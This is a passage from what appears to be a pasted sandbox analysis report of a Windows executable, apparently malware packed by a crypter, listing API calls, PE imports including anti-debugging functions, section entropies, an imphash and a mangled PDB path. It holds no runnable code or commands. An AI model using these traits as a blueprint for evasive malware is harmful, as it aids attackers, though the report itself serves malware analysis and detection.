  2320. "advapi32.dll.RegQueryValueExA",
  2321. "powrprof.dll.CallNtPowerInformation",
  2322. "psapi.dll.EnumProcessModules",
  2323. "version.dll.GetFileVersionInfoSizeA",
  2324. "version.dll.GetFileVersionInfoA",
  2325. "version.dll.VerQueryValueA",
  2326. "verifier.dll.VerifierEnumerateResource",
  2327. "ntdll.dll.NtSuspendProcess",
  2328. "ntdll.dll.NtResumeProcess",
  2329. "advapi32.dll.QueryTraceW",
  2330. "advapi32.dll.IsValidSid",
  2331. "advapi32.dll.GetLengthSid",
  2332. "advapi32.dll.CopySid",
  2333. "advapi32.dll.InitializeAcl",
  2334. "advapi32.dll.AddAccessAllowedAceEx",
  2335. "advapi32.dll.InitializeSecurityDescriptor",
  2336. "advapi32.dll.SetSecurityDescriptorDacl",
  2337. "advapi32.dll.RegisterEventSourceW",
  2338. "advapi32.dll.ReportEventW",
  2339. "advapi32.dll.DeregisterEventSource",
  2340. "wer.dll.WerpGetStoreLocation",
  2341. "wer.dll.WerpGetStoreType",
  2342. "wer.dll.WerReportCloseHandle",
  2343. "user32.dll.MsgWaitForMultipleObjects",
  2344. "wer.dll.WerpFreeString",
  2345. "user32.dll.GetProcessWindowStation",
  2346. "user32.dll.GetThreadDesktop",
  2347. "user32.dll.GetUserObjectInformationW",
  2348. "werui.dll.WerUICreate",
  2349. "werui.dll.WerUIStart",
  2350. "werui.dll.WerUITerminate",
  2351. "werui.dll.WerUIDelete"
  2352. ]
  2353.  
  2354. [*] Static Analysis: {
  2355. "pe": {
  2356. "peid_signatures": null,
  2357. "imports": [
  2358. {
  2359. "imports": [
  2360. {
  2361. "name": "DebugActiveProcess",
  2362. "address": "0x42a010"
  2363. },
  2364. {
  2365. "name": "LockFile",
  2366. "address": "0x42a014"
  2367. },
  2368. {
  2369. "name": "CloseHandle",
  2370. "address": "0x42a018"
  2371. },
  2372. {
  2373. "name": "GetHandleInformation",
  2374. "address": "0x42a01c"
  2375. },
  2376. {
  2377. "name": "GetTickCount",
  2378. "address": "0x42a020"
  2379. },
  2380. {
  2381. "name": "lstrlenA",
  2382. "address": "0x42a024"
  2383. },
  2384. {
  2385. "name": "GetModuleHandleA",
  2386. "address": "0x42a028"
  2387. },
  2388. {
  2389. "name": "CreateHardLinkW",
  2390. "address": "0x42a02c"
  2391. },
  2392. {
  2393. "name": "GetNumberFormatW",
  2394. "address": "0x42a030"
  2395. },
  2396. {
  2397. "name": "ExitProcess",
  2398. "address": "0x42a034"
  2399. },
  2400. {
  2401. "name": "CreateToolhelp32Snapshot",
  2402. "address": "0x42a038"
  2403. },
  2404. {
  2405. "name": "Module32First",
  2406. "address": "0x42a03c"
  2407. },
  2408. {
  2409. "name": "ReadFile",
  2410. "address": "0x42a040"
  2411. },
  2412. {
  2413. "name": "CreateFileW",
  2414. "address": "0x42a044"
  2415. },
  2416. {
  2417. "name": "GetStringTypeW",
  2418. "address": "0x42a048"
  2419. },
  2420. {
  2421. "name": "OutputDebugStringW",
  2422. "address": "0x42a04c"
  2423. },
  2424. {
  2425. "name": "WriteConsoleW",
  2426. "address": "0x42a050"
  2427. },
  2428. {
  2429. "name": "SetFilePointerEx",
  2430. "address": "0x42a054"
  2431. },
  2432. {
  2433. "name": "GetBinaryTypeA",
  2434. "address": "0x42a058"
  2435. },
  2436. {
  2437. "name": "VirtualProtect",
  2438. "address": "0x42a05c"
  2439. },
  2440. {
  2441. "name": "PeekConsoleInputA",
  2442. "address": "0x42a060"
  2443. },
  2444. {
  2445. "name": "LocalAlloc",
  2446. "address": "0x42a064"
  2447. },
  2448. {
  2449. "name": "SetStdHandle",
  2450. "address": "0x42a068"
  2451. },
  2452. {
  2453. "name": "HeapReAlloc",
  2454. "address": "0x42a06c"
  2455. },
  2456. {
  2457. "name": "EncodePointer",
  2458. "address": "0x42a070"
  2459. },
  2460. {
  2461. "name": "DecodePointer",
  2462. "address": "0x42a074"
  2463. },
  2464. {
  2465. "name": "RaiseException",
  2466. "address": "0x42a078"
  2467. },
  2468. {
  2469. "name": "RtlUnwind",
  2470. "address": "0x42a07c"
  2471. },
  2472. {
  2473. "name": "GetCommandLineW",
  2474. "address": "0x42a080"
  2475. },
  2476. {
  2477. "name": "IsProcessorFeaturePresent",
  2478. "address": "0x42a084"
  2479. },
  2480. {
  2481. "name": "GetLastError",
  2482. "address": "0x42a088"
  2483. },
  2484. {
  2485. "name": "HeapAlloc",
  2486. "address": "0x42a08c"
  2487. },
  2488. {
  2489. "name": "HeapFree",
  2490. "address": "0x42a090"
  2491. },
  2492. {
  2493. "name": "GetModuleHandleExW",
  2494. "address": "0x42a094"
  2495. },
  2496. {
  2497. "name": "GetProcAddress",
  2498. "address": "0x42a098"
  2499. },
  2500. {
  2501. "name": "AreFileApisANSI",
  2502. "address": "0x42a09c"
  2503. },
  2504. {
  2505. "name": "MultiByteToWideChar",
  2506. "address": "0x42a0a0"
  2507. },
  2508. {
  2509. "name": "WideCharToMultiByte",
  2510. "address": "0x42a0a4"
  2511. },
  2512. {
  2513. "name": "HeapSize",
  2514. "address": "0x42a0a8"
  2515. },
  2516. {
  2517. "name": "EnterCriticalSection",
  2518. "address": "0x42a0ac"
  2519. },
  2520. {
  2521. "name": "LeaveCriticalSection",
  2522. "address": "0x42a0b0"
  2523. },
  2524. {
  2525. "name": "FlushFileBuffers",
  2526. "address": "0x42a0b4"
  2527. },
  2528. {
  2529. "name": "WriteFile",
  2530. "address": "0x42a0b8"
  2531. },
  2532. {
  2533. "name": "GetConsoleCP",
  2534. "address": "0x42a0bc"
  2535. },
  2536. {
  2537. "name": "GetConsoleMode",
  2538. "address": "0x42a0c0"
  2539. },
  2540. {
  2541. "name": "DeleteCriticalSection",
  2542. "address": "0x42a0c4"
  2543. },
  2544. {
  2545. "name": "FatalAppExitA",
  2546. "address": "0x42a0c8"
  2547. },
  2548. {
  2549. "name": "IsDebuggerPresent",
  2550. "address": "0x42a0cc"
  2551. },
  2552. {
  2553. "name": "SetLastError",
  2554. "address": "0x42a0d0"
  2555. },
  2556. {
  2557. "name": "GetCurrentThread",
  2558. "address": "0x42a0d4"
  2559. },
  2560. {
  2561. "name": "GetCurrentThreadId",
  2562. "address": "0x42a0d8"
  2563. },
  2564. {
  2565. "name": "GetProcessHeap",
  2566. "address": "0x42a0dc"
  2567. },
  2568. {
  2569. "name": "GetStdHandle",
  2570. "address": "0x42a0e0"
  2571. },
  2572. {
  2573. "name": "GetFileType",
  2574. "address": "0x42a0e4"
  2575. },
  2576. {
  2577. "name": "GetStartupInfoW",
  2578. "address": "0x42a0e8"
  2579. },
  2580. {
  2581. "name": "GetModuleFileNameW",
  2582. "address": "0x42a0ec"
  2583. },
  2584. {
  2585. "name": "QueryPerformanceCounter",
  2586. "address": "0x42a0f0"
  2587. },
  2588. {
  2589. "name": "GetCurrentProcessId",
  2590. "address": "0x42a0f4"
  2591. },
  2592. {
  2593. "name": "GetSystemTimeAsFileTime",
  2594. "address": "0x42a0f8"
  2595. },
  2596. {
  2597. "name": "GetEnvironmentStringsW",
  2598. "address": "0x42a0fc"
  2599. },
  2600. {
  2601. "name": "FreeEnvironmentStringsW",
  2602. "address": "0x42a100"
  2603. },
  2604. {
  2605. "name": "UnhandledExceptionFilter",
  2606. "address": "0x42a104"
  2607. },
  2608. {
  2609. "name": "SetUnhandledExceptionFilter",
  2610. "address": "0x42a108"
  2611. },
  2612. {
  2613. "name": "InitializeCriticalSectionAndSpinCount",
  2614. "address": "0x42a10c"
  2615. },
  2616. {
  2617. "name": "CreateEventW",
  2618. "address": "0x42a110"
  2619. },
  2620. {
  2621. "name": "Sleep",
  2622. "address": "0x42a114"
  2623. },
  2624. {
  2625. "name": "GetCurrentProcess",
  2626. "address": "0x42a118"
  2627. },
  2628. {
  2629. "name": "TerminateProcess",
  2630. "address": "0x42a11c"
  2631. },
  2632. {
  2633. "name": "TlsAlloc",
  2634. "address": "0x42a120"
  2635. },
  2636. {
  2637. "name": "TlsGetValue",
  2638. "address": "0x42a124"
  2639. },
  2640. {
  2641. "name": "TlsSetValue",
  2642. "address": "0x42a128"
  2643. },
  2644. {
  2645. "name": "TlsFree",
  2646. "address": "0x42a12c"
  2647. },
  2648. {
  2649. "name": "GetModuleHandleW",
  2650. "address": "0x42a130"
  2651. },
  2652. {
  2653. "name": "CreateSemaphoreW",
  2654. "address": "0x42a134"
  2655. },
  2656. {
  2657. "name": "SetConsoleCtrlHandler",
  2658. "address": "0x42a138"
  2659. },
  2660. {
  2661. "name": "GetDateFormatW",
  2662. "address": "0x42a13c"
  2663. },
  2664. {
  2665. "name": "GetTimeFormatW",
  2666. "address": "0x42a140"
  2667. },
  2668. {
  2669. "name": "CompareStringW",
  2670. "address": "0x42a144"
  2671. },
  2672. {
  2673. "name": "LCMapStringW",
  2674. "address": "0x42a148"
  2675. },
  2676. {
  2677. "name": "GetLocaleInfoW",
  2678. "address": "0x42a14c"
  2679. },
  2680. {
  2681. "name": "IsValidLocale",
  2682. "address": "0x42a150"
  2683. },
  2684. {
  2685. "name": "GetUserDefaultLCID",
  2686. "address": "0x42a154"
  2687. },
  2688. {
  2689. "name": "EnumSystemLocalesW",
  2690. "address": "0x42a158"
  2691. },
  2692. {
  2693. "name": "FreeLibrary",
  2694. "address": "0x42a15c"
  2695. },
  2696. {
  2697. "name": "LoadLibraryExW",
  2698. "address": "0x42a160"
  2699. },
  2700. {
  2701. "name": "IsValidCodePage",
  2702. "address": "0x42a164"
  2703. },
  2704. {
  2705. "name": "GetACP",
  2706. "address": "0x42a168"
  2707. },
  2708. {
  2709. "name": "GetOEMCP",
  2710. "address": "0x42a16c"
  2711. },
  2712. {
  2713. "name": "GetCPInfo",
  2714. "address": "0x42a170"
  2715. },
  2716. {
  2717. "name": "ReadConsoleW",
  2718. "address": "0x42a174"
  2719. }
  2720. ],
  2721. "dll": "KERNEL32.dll"
  2722. },
  2723. {
  2724. "imports": [
  2725. {
  2726. "name": "DialogBoxIndirectParamW",
  2727. "address": "0x42a184"
  2728. },
  2729. {
  2730. "name": "IsZoomed",
  2731. "address": "0x42a188"
  2732. },
  2733. {
  2734. "name": "RegisterDeviceNotificationW",
  2735. "address": "0x42a18c"
  2736. },
  2737. {
  2738. "name": "DrawStateA",
  2739. "address": "0x42a190"
  2740. },
  2741. {
  2742. "name": "GetMonitorInfoW",
  2743. "address": "0x42a194"
  2744. }
  2745. ],
  2746. "dll": "USER32.dll"
  2747. },
  2748. {
  2749. "imports": [
  2750. {
  2751. "name": "AbortSystemShutdownA",
  2752. "address": "0x42a000"
  2753. },
  2754. {
  2755. "name": "RegCreateKeyExA",
  2756. "address": "0x42a004"
  2757. },
  2758. {
  2759. "name": "RegisterServiceCtrlHandlerW",
  2760. "address": "0x42a008"
  2761. }
  2762. ],
  2763. "dll": "ADVAPI32.dll"
  2764. },
  2765. {
  2766. "imports": [
  2767. {
  2768. "name": "TransparentBlt",
  2769. "address": "0x42a17c"
  2770. }
  2771. ],
  2772. "dll": "MSIMG32.dll"
  2773. }
  2774. ],
  2775. "digital_signers": null,
  2776. "exported_dll_name": null,
  2777. "actual_checksum": "0x000456cb",
  2778. "overlay": null,
  2779. "imagebase": "0x00400000",
  2780. "reported_checksum": "0x000456cb",
  2781. "icon_hash": null,
  2782. "entrypoint": "0x00404ea5",
  2783. "timestamp": "2018-11-21 05:28:09",
  2784. "osversion": "5.1",
  2785. "sections": [
  2786. {
  2787. "name": ".text",
  2788. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  2789. "virtual_address": "0x00001000",
  2790. "size_of_data": "0x00028800",
  2791. "entropy": "6.65",
  2792. "raw_address": "0x00000400",
  2793. "virtual_size": "0x0002866f",
  2794. "characteristics_raw": "0x60000020"
  2795. },
  2796. {
  2797. "name": ".rdata",
  2798. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2799. "virtual_address": "0x0002a000",
  2800. "size_of_data": "0x00011800",
  2801. "entropy": "6.22",
  2802. "raw_address": "0x00028c00",
  2803. "virtual_size": "0x00011630",
  2804. "characteristics_raw": "0x40000040"
  2805. },
  2806. {
  2807. "name": ".data",
  2808. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2809. "virtual_address": "0x0003c000",
  2810. "size_of_data": "0x00001e00",
  2811. "entropy": "3.06",
  2812. "raw_address": "0x0003a400",
  2813. "virtual_size": "0x00804ea0",
  2814. "characteristics_raw": "0xc0000040"
  2815. },
  2816. {
  2817. "name": ".rsrc",
  2818. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2819. "virtual_address": "0x00841000",
  2820. "size_of_data": "0x00003e00",
  2821. "entropy": "6.27",
  2822. "raw_address": "0x0003c200",
  2823. "virtual_size": "0x00003d40",
  2824. "characteristics_raw": "0x40000040"
  2825. },
  2826. {
  2827. "name": ".reloc",
  2828. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  2829. "virtual_address": "0x00845000",
  2830. "size_of_data": "0x00002200",
  2831. "entropy": "6.64",
  2832. "raw_address": "0x00040000",
  2833. "virtual_size": "0x000021a4",
  2834. "characteristics_raw": "0x42000040"
  2835. }
  2836. ],
  2837. "resources": [],
  2838. "dirents": [
  2839. {
  2840. "virtual_address": "0x00000000",
  2841. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2842. "size": "0x00000000"
  2843. },
  2844. {
  2845. "virtual_address": "0x0003accc",
  2846. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2847. "size": "0x00000064"
  2848. },
  2849. {
  2850. "virtual_address": "0x00841000",
  2851. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2852. "size": "0x00003d40"
  2853. },
  2854. {
  2855. "virtual_address": "0x00000000",
  2856. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2857. "size": "0x00000000"
  2858. },
  2859. {
  2860. "virtual_address": "0x00000000",
  2861. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2862. "size": "0x00000000"
  2863. },
  2864. {
  2865. "virtual_address": "0x00845000",
  2866. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2867. "size": "0x000021a4"
  2868. },
  2869. {
  2870. "virtual_address": "0x0002a1f0",
  2871. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2872. "size": "0x00000038"
  2873. },
  2874. {
  2875. "virtual_address": "0x00000000",
  2876. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2877. "size": "0x00000000"
  2878. },
  2879. {
  2880. "virtual_address": "0x00000000",
  2881. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2882. "size": "0x00000000"
  2883. },
  2884. {
  2885. "virtual_address": "0x00000000",
  2886. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2887. "size": "0x00000000"
  2888. },
  2889. {
  2890. "virtual_address": "0x00000000",
  2891. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2892. "size": "0x00000000"
  2893. },
  2894. {
  2895. "virtual_address": "0x00000000",
  2896. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2897. "size": "0x00000000"
  2898. },
  2899. {
  2900. "virtual_address": "0x0002a000",
  2901. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2902. "size": "0x0000019c"
  2903. },
  2904. {
  2905. "virtual_address": "0x00000000",
  2906. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2907. "size": "0x00000000"
  2908. },
  2909. {
  2910. "virtual_address": "0x00000000",
  2911. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2912. "size": "0x00000000"
  2913. },
  2914. {
  2915. "virtual_address": "0x00000000",
  2916. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2917. "size": "0x00000000"
  2918. }
  2919. ],
  2920. "exports": [],
  2921. "guest_signers": {},
  2922. "imphash": "e226e36fbb8dbb02d3784367b0c7fa81",
  2923. "icon_fuzzy": null,
  2924. "icon": null,
  2925. "pdbpath": "C:\\vagar_helayagu-limi.pdb\\x00ntime\\crypt\\tmp_92407619\\bin\\vuvigilil.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\xd7C\\x00\\xf8\\x9aC",
  2926. "imported_dll_count": 4,
  2927. "versioninfo": []
  2928. }
  2929. }
Advertisement
Add Comment
Please, Sign In to add comment